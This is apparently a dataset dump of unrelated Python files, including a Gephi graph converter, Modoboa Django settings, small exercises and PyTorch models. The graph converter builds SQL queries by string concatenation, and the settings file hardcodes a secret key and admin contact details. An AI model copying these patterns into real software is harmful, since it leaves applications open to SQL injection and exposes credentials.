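assertSchema above is a thin wrapper over jsonschema.validate. A minimal standalone check showing the raise-on-mismatch behavior that the fixture converts into a test failure:

```python
import jsonschema

schema = {
    'type': 'object',
    'required': ['id'],
    'properties': {'id': {'type': 'string'}},
}
jsonschema.validate({'id': 'abc'}, schema)        # passes silently
try:
    jsonschema.validate({'id': 123}, schema)      # wrong type for 'id'
except jsonschema.ValidationError as err:
    print(err.message)
```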
channel}\n team_to_channel = pd.DataFrame(team_to_channel)\n\n for channel_file in channels_list:\n\n gexf = Gexf(\"Gephi.org\", \"A Web network\")\n output = gexf.addGraph(\"directed\", \"static\", \"A Web network\")\n cur.execute('select * from people_channel_relation where channel_id = \\'' + channel_file + '\\' ')\n person_and_channel = cur.fetchall()\n\n if len(person_and_channel) == 0:\n print('1')\n gexf_dict[channel_file] = gexf\n\n else:\n\n person_and_channel = list(map(list, zip(*person_and_channel)))\n person = person_and_channel[0][:]\n channel = person_and_channel[1][:]\n person_and_channel = {'person': person, 'channel': channel}\n person_and_channel = pd.DataFrame(person_and_channel)\n del person\n del channel\n\n person_list = person_and_channel['person']\n\n # print(person_and_channel)\n\n channel_node = output.addNodeAttribute(force_id=\"Channel\", title=\"channel\", type=\"String\")\n team_node = output.addNodeAttribute(force_id=\"Team\", title=\"team\", type=\"String\")\n weight_node = output.addNodeAttribute(force_id=\"weight\", title=\"weight\", type=\"float\")\n person_set = set(person_list)\n person_to_channel = []\n for tem_person in person_set:\n cur.execute('select * from people_channel_relation where people_id = \\'' + tem_person + '\\' ')\n\n person_to_channel = person_to_channel + list(cur.fetchall())\n\n person_to_channel = list(map(list, zip(*person_to_channel)))\n person = person_to_channel[0][:]\n channel = person_to_channel[1][:]\n person_to_channel = {'person': person, 'channel': channel}\n person_to_channel = pd.DataFrame(person_to_channel)\n\n # print(person_to_channel)\n\n cc = 0\n num2333 = len(person_set)\n for tem_id in person_set:\n print(cc / num2333)\n try:\n tem_name = people_id[tem_id]\n except KeyError:\n tem_name = \"Null\"\n\n tem_channel_list = set(person_to_channel[person_to_channel['person'] == tem_id]['channel'])\n\n tmp_node = output.addNode(tem_id, tem_name)\n\n # calculdate node_weight\n node_weight = database_conductor.get_person_weight(tem_id)\n\n tmp_node.addAttribute(weight_node, str(node_weight))\n tem_team_list = set()\n for tem_channel in tem_channel_list:\n # cur.execute('select team_id from team_channel_relation where channel_id = \\'' + tem_channel + '\\'')\n # tem_team_list = cur.fetchall()\n tem_team_list = tem_team_list | set(\n team_to_channel[team_to_channel['channel'] == tem_channel]['team'])\n for tem_team in tem_team_list:\n tmp_node.addAttribute(team_node, tem_team)\n\n for tem_channel in tem_channel_list:\n tmp_node.addAttribute(channel_node, tem_channel)\n\n cc = cc + 1\n\n m = 'mention_based_graph_info'\n cur.execute('select * from ' + m + ' where channel_id = \\'' + channel_file + '\\' ')\n data = cur.fetchall()\n\n msg_att = output.addEdgeAttribute(force_id=\"Message\", title=\"message\", type='String', defaultValue='None')\n weight_att = output.addEdgeAttribute(force_id=\"Weight\", title=\"weight\", type='float', defaultValue='0')\n date_att = output.addEdgeAttribute(force_id=\"Date\", title=\"date\", type='float', defaultValue='None')\n channel_att = output.addEdgeAttribute(force_id=\"Channel\", title=\"channel\", type='String',\n defaultValue='None')\n team_att = output.addEdgeAttribute(force_id=\"Team\", title=\"team\", type='String', defaultValue='None')\n cc = 0\n numhehe = len(data)\n for tem_m in data:\n print(cc / numhehe)\n sender, receiver, text, channel_id, team_id, ts = tem_m\n blob = TextBlob(text)\n text = remove_control_characters(text)\n weight = str(blob.sentiment.polarity)\n try:\n tem_edge 
= output.addEdge(sender + receiver + str(cc), sender, receiver, weight=weight)\n cc = cc + 1\n tem_edge.addAttribute(msg_att, text)\n tem_edge.addAttribute(weight_att, weight)\n tem_edge.addAttribute(date_att, str(ts))\n tem_edge.addAttribute(team_att, team_id)\n tem_edge.addAttribute(channel_att, channel_id)\n except Exception:\n receiver = re.findall('\\<\\@(.*?)\\>', text)[0]\n try:\n tem_edge = output.addEdge(sender + receiver + str(cc), sender, receiver, weight=weight)\n cc = cc + 1\n\n tem_edge.addAttribute(msg_att, text)\n tem_edge.addAttribute(weight_att, weight)\n tem_edge.addAttribute(date_att, str(ts))\n tem_edge.addAttribute(team_att, team_id)\n tem_edge.addAttribute(channel_att, channel_id)\n except Exception:\n pass\n\n # print(channel_file)\n print (team_name, channel_file)\n try:\n output_file = open(dir_path + \"/mention_based/{}_{}.gexf\".format(team_name, channel_file), 'wb')\n # output_file=remove_control_characters(output_file)\n gexf.write(output_file)\n except Exception:\n print(\"Error at writing output_file\")\n\n\n # print(gexf)\n # gexf_dict[channel_file]=gexf\n # print('2')\n try:\n output_file.close()\n except Exception:\n print(\"Error at diong out put_file.close()\")\n\n return gexf_dict\n\n\n\ndatabase_conductor = Database_conductor(True)\nfrom pprint import pprint\nall_team_number = len(database_conductor.get_teams())\nfor index, team in enumerate(database_conductor.get_teams()):\n team_id = team[0]\n print('{}/{} {}'.format(index + 1, all_team_number, team[1]))\n all_channel_number = len(database_conductor.get_channels_from_team(team_id))\n for cnt, (_, channel) in enumerate((database_conductor.get_channels_from_team(team_id))):\n channel, channel_name = (database_conductor.get_channel_detail(channel)[0])\n print('\\t{}/{} {}'.format(cnt + 1, all_channel_number, channel_name))\n convert(team_id, [channel])\n\n\n\n# T024FJS4U C2H9SBGD7","sub_path":"Grapher/conventer.py","file_name":"conventer.py","file_ext":"py","file_size_in_byte":8408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"142023106","text":"\"\"\"\nDjango settings for bearboa project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nimport sys\nimport socket\nfrom logging.handlers import SysLogHandler\n\nfrom django.conf import global_settings\n\nDEV = socket.gethostname() == 'earl'\n\nBASE_DIR = os.path.realpath(os.path.dirname(os.path.dirname(__file__)))\n\nROOT_URLCONF = 'manager/'\nLOGIN_REDIRECT_URL = '/manager/accounts/profile/'\nLOGIN_URL = '/manager/accounts/login/'\nLOGOUT_URL = '/manager/accounts/logout/'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'x=q^32&ficx1)f2uh^j)g-u8@^q07+&n5ddy3k65v$t8d590$x'\nif os.path.isfile('/var/www/modoboa/.secret_key'):\n with open('/var/www/modoboa/.secret_key') as fd:\n SECRET_KEY = fd.read().strip()\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = DEV\n\nTEMPLATE_DEBUG = False\n\nADMINS = [\n ('Gael', 'gpasgrimaud@bearstech.com'),\n]\n\nALLOWED_HOSTS = [\n 'mail.bearstech.com',\n 'mail.lecanardenchaine.fr',\n 'modoboa.bearstech.com',\n 
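The conversion loop above leans on three pygexf calls, addGraph, addNode, and addEdge, plus a TextBlob polarity score as the edge weight. A toy end-to-end version with made-up users:

```python
# Tiny pygexf + TextBlob sketch mirroring the calls used in convert().
from gexf import Gexf
from textblob import TextBlob

gexf = Gexf('example', 'A tiny mention graph')
graph = gexf.addGraph('directed', 'static', 'mentions')
graph.addNode('u1', 'alice')
graph.addNode('u2', 'bob')
weight = str(TextBlob('great work!').sentiment.polarity)   # sentiment as weight
graph.addEdge('e0', 'u1', 'u2', weight=weight)
with open('toy.gexf', 'wb') as out:
    gexf.write(out)
```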
'localhost',\n]\n\nSERVER_EMAIL = 'django@mail.bearstech.com'\n\nSITE_ID = 1\n\n# Password validation rules\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n {\n 'NAME': 'modoboa.core.password_validation.ComplexityValidator',\n 'OPTIONS': {\n 'upper': 1,\n 'lower': 1,\n 'digits': 1,\n 'specials': 0\n }\n },\n]\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django.contrib.staticfiles',\n 'reversion',\n 'django_extensions',\n 'rest_framework',\n 'rest_framework.authtoken',\n)\n\n# A dedicated place to register Modoboa applications\n# Do not delete it.\n# Do not change the order.\nMODOBOA_APPS = (\n 'modoboa',\n 'modoboa.core',\n 'modoboa.lib',\n 'modoboa.admin',\n 'modoboa.relaydomains',\n 'modoboa.limits',\n 'modoboa.parameters',\n # Modoboa extensions here.\n 'modoboa_stats',\n 'modoboa_alias_pipe',\n 'modoboa_postfix_autoreply',\n)\n\nINSTALLED_APPS += MODOBOA_APPS\n\nAUTH_USER_MODEL = 'core.User'\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.TokenAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n ),\n 'DEFAULT_PERMISSION_CLASSES': (\n 'rest_framework.permissions.IsAuthenticated',\n )\n}\n\nMIDDLEWARE_CLASSES = (\n 'x_forwarded_for.middleware.XForwardedForMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'modoboa.core.middleware.LocalConfigMiddleware',\n 'modoboa.lib.middleware.AjaxLoginRedirect',\n 'modoboa.lib.middleware.CommonExceptionCatcher',\n 'modoboa.lib.middleware.RequestCatcherMiddleware',\n)\n\nAUTHENTICATION_BACKENDS = (\n 'django.contrib.auth.backends.ModelBackend',\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'modoboa.core.context_processors.top_notifications',\n ],\n 'debug': False,\n },\n },\n]\n\nROOT_URLCONF = 'bearboa.urls'\n\nWSGI_APPLICATION = 'bearboa.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\nif os.path.exists('/var/www/modoboa/.my.cnf'):\n filename = '/var/www/modoboa/.my.cnf'\nelse:\n filename = '/opt/modoboa/.my.cnf'\nwith open(filename) as fd:\n for line in fd:\n if line.startswith('password'):\n MYSQL_PASSWORD = line.strip().split('=', 1)[1].strip()\n\nDATABASES = {\n \n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 
'NAME': 'modoboa',\n 'USER': 'modoboa',\n 'PASSWORD': MYSQL_PASSWORD,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'ATOMIC_REQUESTS': True,\n 'CONN_MAX_AGE': 0,\n 'OPTIONS' : {\n \"init_command\" : 'SET foreign_key_checks = 0;',\n },\n },\n\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = False\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = DEV and '/sitestatic/' or '/manager/sitestatic/'\nSTATIC_ROOT = os.path.join(BASE_DIR, 'sitestatic')\n\nimport modoboa\nSTATICFILES_DIRS = (\n os.path.join(os.path.dirname(modoboa.__file__), 'bower_components'),\n)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# Modoboa settings\n#MODOBOA_CUSTOM_LOGO = os.path.join(MEDIA_URL, \"custom_logo.png\")\n\n#DOVECOT_LOOKUP_PATH = ('/path/to/dovecot', )\n\nMODOBOA_API_URL = 'http://api.modoboa.org/1/'\n\n# Logging configuration\n\nLOGGING = {\n 'version': 1,\n 'formatters': {\n 'syslog': {\n 'format': '%(name)s: %(levelname)s %(message)s'\n },\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'syslog-auth': {\n 'class': 'logging.handlers.SysLogHandler',\n 'facility': SysLogHandler.LOG_AUTH,\n 'formatter': 'syslog'\n },\n 'modoboa': {\n 'class': 'modoboa.core.loggers.SQLHandler',\n },\n 'stdout': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'stream': sys.stdout,\n }\n },\n 'loggers': {\n 'modoboa.auth': {\n 'handlers': ['syslog-auth', 'modoboa'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'modoboa.admin': {\n 'handlers': ['modoboa'],\n 'level': 'INFO',\n 'propagate': False\n },\n 'django.request': {\n 'handlers': ['mail_admins', 'stdout'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n }\n\n}\n\ntry:\n from local_settings import *\nexcept ImportError:\n pass\n","sub_path":"bearboa/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"114200247","text":"# %load q04_count/build.py\r\n# Default Imports\r\nfrom greyatomlib.python_getting_started.q01_read_data.build import read_data\r\ndata = read_data()\r\n\r\ndef deliveries_count(data = data):\r\n\r\n#print data\r\n count = 0\r\n deli = data['innings'][0]['1st innings']['deliveries']\r\n for i in deli:\r\n #print i\r\n if i.values()[0]['batsman'] == 'RT Ponting':\r\n count = count + 1\r\n return (count)\r\n\r\ndeliveries_count()\r\n","sub_path":"q04_count/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440865888","text":"'''\n\nauthor :@gvnaakhilsurya\n'''\ndef is_win_tic_tac(matrix):\n '''\nit gives the output coditions\n '''\n return_string = ''\n if matrix[0][0] == matrix[1][1] == matrix[2][2]:\n return_string = matrix[0][0]\n elif matrix[0][2] == matrix[1][1] == matrix[2][0]:\n return_string = matrix[0][2]\n elif matrix[0][0] == matrix[1][0] == matrix[2][0]:\n return_string = matrix[0][0]\n elif matrix[0][1] == matrix[1][1] == matrix[2][1]:\n return_string = matrix[0][1]\n elif matrix[0][2] == matrix[1][2] == matrix[2][2]:\n return_string = matrix[0][2]\n elif 
matrix[0][0] == matrix[0][1] == matrix[0][2]:\n return_string = matrix[0][0]\n elif matrix[1][0] == matrix[1][1] == matrix[1][2]:\n return_string = matrix[1][0]\n elif matrix[2][0] == matrix[2][1] == matrix[2][2]:\n return_string = matrix[2][0]\n else:\n return_string = \"invalid input\"\n return return_string\ndef is_validation(matrix):\n '''\n It checks for the condition\n '''\n tic1_list = full_string(matrix)\n if tic1_list.count('x') > 5 or tic1_list.count('o') > 5 or\\\n tic1_list.count('x') == tic1_list.count('o'):\n return \"invalid game\"\n for _ in range(len(tic1_list)):\n for j in tic1_list:\n if j not in 'ox.':\n return \"invalid input\"\n if (tic1_list.count('x') == 4 and tic1_list.count('o') == 5) or\\\n (tic1_list.count('x') == 5 and tic1_list.count('o') == 4):\n return \"draw\"\n\n return 1\ndef empty_tictac():\n '''\n # it converts the input into lists\n '''\n matrix = []\n for _ in range(3):\n list_temp = input().split()\n matrix.append(list_temp)\n return matrix\ndef full_string(matrix):\n '''\n it converts thr lists of list into string\n '''\n list_temp = []\n for i in matrix:\n list_temp.extend(i)\n return list_temp\ndef main():\n '''\n it is the main function\n '''\n inp_tic = empty_tictac()\n clean_string = full_string(inp_tic)\n output = is_validation(clean_string)\n if output == 1:\n print(is_win_tic_tac(inp_tic))\n else:\n print(output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"cspp1-pratice/m21/CodeCampTicTacToe/tictactae.py","file_name":"tictactae.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"525591900","text":"# RNN-model for predicting relational reasoning. \n# The model uses basic RNN-units.\n\n\nimport time\n\nimport collections\n\nimport numpy as np\nfrom pandas.core.common import flatten\nimport ccobra\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\n\n\n\n\n\nclass RNN(nn.Module):\n def __init__(self, input_size=40, hidden_size=64, output_size=1):\n super(RNN, self).__init__()\n \n self.n_layers = 2\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.output_size = output_size\n #Defining the layers\n # RNN Layer\n self.rnn = nn.RNN(input_size, hidden_size, self.n_layers, batch_first=True) \n # Fully connected layer\n self.fc = nn.Linear(hidden_size, output_size)\n self.sigmoid = torch.nn.Sigmoid()\n \n def forward(self, x):\n \n batch_size = x.size(0)\n\n # Initializing hidden state\n hidden = self.init_hidden(batch_size)\n\n out, hidden = self.rnn(x, hidden)\n\n #Reshaping output for the fully connected layer.\n out = out.contiguous().view(-1, self.hidden_size)\n out = self.fc(out)\n out = self.sigmoid(out)\n \n return out, hidden\n \n def init_hidden(self, batch_size):\n # This method generates the first hidden state of zeros.\n hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return hidden\n\n\n\ndef getObjctMapping(task):\n objcts = []\n for i in task:\n objcts.append(i[1])\n objcts.append(i[2])\n objcts = [*{*objcts}]\n\n return dict(zip( objcts, list(range(len(objcts)))))\n\noutput_mpping = {1: True, 0: False}\n\ndef encode(task, mpping):\n result = []\n for i in task:\n premise = [0] * 5\n premise[mpping[i[1]]] = -1\n premise[mpping[i[2]]] = 1\n result.append(premise)\n return result\n\ndef getTarget(targ):\n if targ:\n return [1]\n else: \n return [0]\n\nclass RNNModel(ccobra.CCobraModel):\n def __init__(self, name='RNN', k=1):\n 
super(RNNModel, self).__init__(name, [\"spatial-relational\"], [\"verify\"])\n\n self.net = RNN()\n self.hidden = None\n\n\n self.n_epochs = 50\n\n self.optimizer = optim.Adam(self.net.parameters())\n self.loss = nn.BCELoss()\n\n def pre_train(self, dataset):\n torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n \n x = []\n y = []\n\n for subj_train_data in dataset:\n subj_x = []\n subj_y = []\n for seq_train_data in subj_train_data:\n task = seq_train_data['item'].task\n\n objct_mpping = getObjctMapping(task)\n\n premises = encode(task, objct_mpping)\n\n choices = encode(seq_train_data['item'].choices[0], objct_mpping)\n\n inp = list(flatten(premises)) + list(flatten(choices))\n\n target = getTarget(seq_train_data['response'])\n subj_x.append(inp)\n\n\n subj_y.append(target)\n\n x.append(subj_x)\n y.append(subj_y)\n x = np.array(x)\n y = np.array(y)\n\n self.train_x = torch.from_numpy(x).float()\n self.train_y = torch.from_numpy(y).float()\n\n\n self.train_network(self.train_x, self.train_y, self.n_epochs, verbose=True)\n\n\n\n def train_network(self, train_x, train_y, n_epochs, verbose=False):\n if verbose:\n print('Starting training...')\n\n for epoch in range(self.n_epochs):\n start_time = time.time()\n\n # Shuffle the training data\n perm_idxs = np.random.permutation(np.arange(len(train_x)))\n train_x = train_x[perm_idxs]\n train_y = train_y[perm_idxs]\n\n losses = []\n for idx in range(len(train_x)):\n cur_x = train_x[idx]\n cur_y = train_y[idx]\n\n\n inp = cur_x.view(-1, 1, 40)\n \n outputs, _ = self.net(inp)\n\n loss = self.loss(outputs, cur_y)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n losses.append(loss.item())\n\n if verbose:\n print('Epoch {}/{} ({:.2f}s): {:.4f} ({:.4f})'.format(\n epoch + 1, n_epochs, time.time() - start_time, np.mean(losses), np.std(losses)))\n\n accs = []\n for subj_idx in range(len(self.train_x)):\n pred, _ = self.net(self.train_x[subj_idx].view(-1,1,40))\n pred = pred.round()\n\n truth = self.train_y[subj_idx]\n\n\n acc = torch.mean((pred == truth).float()).item()\n accs.append(acc)\n\n print(' acc mean: {:.2f}'.format(np.mean(accs)))\n print(' acc std : {:.2f}'.format(np.std(accs)))\n\n\n self.net.eval()\n\n\n # Turns the prediction into an statement according if the given conclusion is perceived true or false. \n def predict(self, item, **kwargs):\n task = item.task\n objct_mpping = getObjctMapping(task)\n premises = encode(task, objct_mpping)\n choices = encode(item.choices[0], objct_mpping)\n x = torch.FloatTensor(list(flatten(premises)) + list(flatten(choices)))\n output, self.hidden = self.net(x.view(1, 1, -1))\n\n label = int(np.round(output.detach().numpy()[0][0]))\n\n self.prediction = output_mpping[label]\n return self.prediction\n\n","sub_path":"relational/student_projects/2020_karkkainen/models/ml/rnn/modelver.py","file_name":"modelver.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"348874382","text":"import urllib.request\n\n\ndef ipData(ip):\n with urllib.request.urlopen('http://ip-api.com/csv/{}'.format(ip)) as response:\n html = response.read()\n data = html.decode(\"utf-8\").replace(\"\\\"\", \"\").split(\",\")\n print(\"{} - - {}, {}. 
{}, {}\".format(data[13], data[4], data[1], data[10], data[11]))\n \nresponse = None\n\nwhile (response != \"quit\"):\n response = input(\"IP address: \")\n ipData(response)","sub_path":"ipapi.py","file_name":"ipapi.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"120415950","text":"from prune.config import data, batch_size, epoch, t_cfg, t_weight, ms\nfrom prune.config import finetune_folders as folders\nimport shutil\n\nimport os\n\ncmds = []\nfor folder in folders:\n cfg, model = \"\", \"\"\n path_ls = folder.split(\"/\")\n wdir = path_ls[1] + \"-\" + path_ls[2]\n\n files = [os.path.join(folder, f) for f in os.listdir(folder)]\n for file in files:\n if \"cfg\" in file:\n cfg = file\n elif \".pt\" in file or \".weight\" in file:\n model = file\n else:\n continue\n\n assert cfg != \"\" and model != \"\", \"Missing file in {}! (cfg or weight missed)\".format(folder)\n cmds.append(\"python train.py --wdir finetune/{}_distilled --cfg {} --weights {} --data {} --epochs {} \"\n \"--batch-size {} --multi-scale {} --t_cfg {} --t_weight {}\".format(wdir, cfg, model, data, epoch,\n batch_size, ms, t_cfg, t_weight))\n\nfor cmd in cmds:\n cmd = cmd.replace(\"--multi-scale False\", \"\")\n cmd = cmd.replace(\"--multi-scale True\", \"--multi-scale\")\n os.system(cmd)\n # print(cmd)\n","sub_path":"auto_distillation.py","file_name":"auto_distillation.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"440369285","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework import routers, serializers, viewsets, status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom api import models\nfrom api.serializers import TemplateSerializer\nfrom api.system import errorcode\nfrom api.utils import make_error_response, make_succuess_response\n\nclass TemplateViewSet(viewsets.ModelViewSet):\n queryset = models.Template.objects.all()\n serializer_class = TemplateSerializer\n\n def create(self, request, *args, **kwargs):\n user = request.user\n serializer = TemplateSerializer(data={\n 'author_id': user.id,\n 'author_name': user.name,\n 'title': request.data['title'],\n 'content': request.data['content']\n })\n\n if not serializer.is_valid():\n return make_error_response(\n errorcode.CODE_10001_PARAMS_INSUFFICIENT,\n serializer.errors.values()[0][0])\n\n serializer.save()\n\n return make_succuess_response(serializer.data)\n\n def list(self, request, *args, **kwargs):\n user = request.user\n templates = models.Template.objects.filter(author_id=user.id, is_deleted=0).order_by('-create_time')\n\n return make_succuess_response(TemplateSerializer(templates, many=True).data)\n\n def destroy(self, request, *args, **kwargs):\n user = request.user\n template = self.get_object()\n\n # 只有模板的创建者才有权限删除模板\n if user.id != template.author_id:\n return make_error_response(errorcode.CODE_10202_NO_PERMISSION)\n\n template.delete()\n \n return make_succuess_response([])\n","sub_path":"src/api/viewsets/templateviewset.py","file_name":"templateviewset.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"190930341","text":"\"\"\"---ノイズをループさせて結合し、任意の時間まで長くするプログラム---\"\"\"\nimport argparse\nimport numpy as np\nimport wave\nimport os\nimport array\n\n###--- 
utilsディレクトリをインポートするための処理 ---###\n#import sys\n#sys.path.append('../utils')\nimport vad_utils\n\ndef get_args():\n parser = argparse.ArgumentParser(description = 'Get path of wavfiles directory')\n parser.add_argument('--input_wav', type = str, default = 'noise_elements/babble_noise.wav', help = '入力ノイズ音声ネーム')\n parser.add_argument('--output_wav', type = str, default = 'babble_noise_cocnat.wav', help = '出力ノイズ音声ネーム')\n parser.add_argument('--time', type = int, default = 60, help = 'time(minute)')\n\n return parser.parse_args()\n\n\ndef cal_amp(wf):\n buf = wf.readframes(wf.getnframes())\n amp = (np.frombuffer(buf, dtype = \"int16\")).astype(np.float64)\n return amp\n\nif __name__ == \"__main__\":\n\n\n \"\"\"---get directry and wav data path---\"\"\"\n args = get_args()\n\n input_wav = vad_utils.get_path(args.input_wav) #get input path of de-silence file\n output_wav = vad_utils.get_path(args.output_wav)\n\n\n\n \"\"\"---concat clean wav data ---\"\"\"\n second = args.time * 60\n concat_data = np.empty(0)\n\n\n wf = wave.open(input_wav, \"r\")\n frames = wf.getnframes()\n sr = wf.getframerate()\n sum_frames = second * sr\n amp= cal_amp(wf)\n\n #print(amp)\n print(sum_frames)\n\n while(sum_frames > len(concat_data)):\n concat_data = np.concatenate([concat_data, amp])\n print(len(concat_data))\n\n wf.close()\n\n concat_data = np.array(concat_data)\n output_data = wave.Wave_write(output_wav)\n output_data.setparams(wf.getparams())\n output_data.writeframes(array.array('h', concat_data.astype(np.int16)).tostring())\n output_data.close()\n","sub_path":"VAD/utils/concat_noise.py","file_name":"concat_noise.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"371450056","text":"import sys\n\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom holder import *\nfrom util import *\n\n\nclass CRF(torch.nn.Module):\n\tdef __init__(self, opt, shared):\n\t\tsuper(CRF, self).__init__()\n\t\tself.opt = opt\n\t\tself.shared = shared\n\n\t\tself.trans_weight = nn.Parameter(\n\t\t\ttorch.ones(opt.num_label+2, opt.num_label+2), requires_grad=True)\n\t\t# hacky, to postpone initialization to make sure data split are the same as basline\n\t\tself.trans_weight.skip_init = 1\n\t\tself.trans_weight.initialized = 0\n\n\t\tself.bos_idx = 0\n\t\tself.eos_idx = 1\n\t\tself.trans_weight.data[self.bos_idx, :] = -10000.0\n\t\tself.trans_weight.data[:, self.eos_idx] = -10000.0\n\n\tdef __init_trans(self):\n\t\tif self.trans_weight.requires_grad and self.training:\n\t\t\tprint('lazy initializing transition weight')\n\t\t\t#nn.init.xavier_uniform_(self.trans_weight)\n\t\t\tnn.init.normal(self.trans_weight, 0, 1)\n\t\t\t#self.trans_weight.data[self.bos_idx, :] = -10000.0\n\t\t\t#self.trans_weight.data[:, self.eos_idx] = -10000.0\n\n\tdef log_sum_exp(self, vec, dim=0):\n\t\tmax_v, idx = torch.max(vec, dim)\n\t\tmax_exp = max_v.unsqueeze(-1).expand_as(vec)\n\t\treturn max_v + torch.log(torch.sum(torch.exp(vec - max_exp), dim))\n\n\tdef argmax(self, x): # for 1D tensor\n\t\treturn torch.max(x, 0)[1].data[0]\n\n\t# get the partition Z\n\t# score of shape (batch_l, source_l, num_label+2)\n\tdef forward(self, score):\n\t\t# trim off the <box> and <eos>\n\t\tscore = score[:, 1:-1, :]\n\t\tbatch_size, seq_len, n_labels = score.size()\n\t\talpha = score.data.new(batch_size, n_labels).fill_(-10000)\n\t\talpha[:, self.bos_idx] = 0\n\t\talpha = Variable(alpha)\n\t\tlens = 
